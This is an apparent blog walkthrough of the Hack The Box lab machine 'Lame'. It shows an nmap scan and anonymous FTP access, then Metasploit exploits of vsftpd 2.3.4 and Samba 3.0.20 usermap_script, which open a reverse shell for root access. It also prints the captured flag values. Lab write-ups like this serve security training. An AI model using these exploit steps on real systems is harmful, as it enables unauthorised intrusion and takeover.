This is the walkthrough for Hackthebox machine Lame. I am writing this walkthrough based on my way how I get into the machine. This will be useful for people who want to know how to approach the new machine.
Machine Name: Lame
IP Address: 10.10.10.3
For Information Gathering I have used Nmap tool with is the enumeration tool to scan the open ports and services that are running in the target machine.
Command : nmap -p 1-65535 -T4 -A -v 10.10.10.3
This command will scan all the TCP ports from 1 to 65535 ports aggresively. Some people will do the normal scan but it will scan ports form 1 to 1000 only. In some machines there are services that are running on uncommon ports, So we have to scan all the ports. Ensure that no ports are missed.
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.6 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Form the results of nmap we came to know that the target machine has 5 open ports with different services. The target machine has running service in 21/ftp with the allowed Ananymous FTP login.
Lets check the port 21/ftp
┌─[root@parrot]─[/home/user] └──╼ #ftp 10.10.10.3 Connected to 10.10.10.3. 220 (vsFTPd 2.3.4) Name (10.10.10.3:user): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> cd / 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp>
Form he FTP we coudn’t able to get any access since the FTP service is running with restrictions. Form the information gathering we already know that we the FTP service is vsftpd 2.3.4. Lets try to exploit this service.
For that we have to check this version has any exploit, So I used searchsploit.
┌─[root@parrot]─[/home/user] └──╼ #searchsploit vsftpd 2.3.4 ------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------- ---------------------------------------- vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb ------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result
Nice we have an exploit for this vulnerability and it is already in metasploit. So I have used the exploit “unix/ftp/vsftpd_234_backdoor”.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit [*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.3:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created.
The exploit doesn’t seems working, let’s enumerate more from the machine. We already know that the target machine has other ports lets take 455/SMB. But we don’t know the exact version of the SMB service. For that I’ve used auxiliary modules from metasploit which is “auxiliary/scanner/smb/smb_version”.
msf5 auxiliary(scanner/smb/smb_version) > run [*] 10.10.10.3:445 - Host could not be identified: Unix (Samba 3.0.20-Debian) [*] 10.10.10.3:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
After running this module we found that the target machine is running with Samba version 3.0.20. Lets check this version in searchsploit.
┌─[root@parrot]─[/home/user] └──╼ #searchsploit samba 3.0.20 ------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------- ---------------------------------------- Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Ex | exploits/unix/remote/16320.rb Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt ------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result
We found ‘Username’ map script’ Command Execution exploit. Lets use this exploit in metasploit.
msf5 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP double handler on 10.10.14.6:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ycX5yCHbmWF2Ud9B; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "ycX5yCHbmWF2Ud9B\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.3:36697) at 2019-10-24 22:01:40 -0400
From the exploit “multi/samba/usermap_script” we got the root shell access to that target machine. Let’s get the flags.
whoami root /home/makis cat user.txt 69454a937d94f5f0225ea00acd2e84c5 pwd /root cat root.txt 92caac3be140ef409e45721348a4e9df
We found both the user flag and root flag. That’s all. 🙂
Member discussion: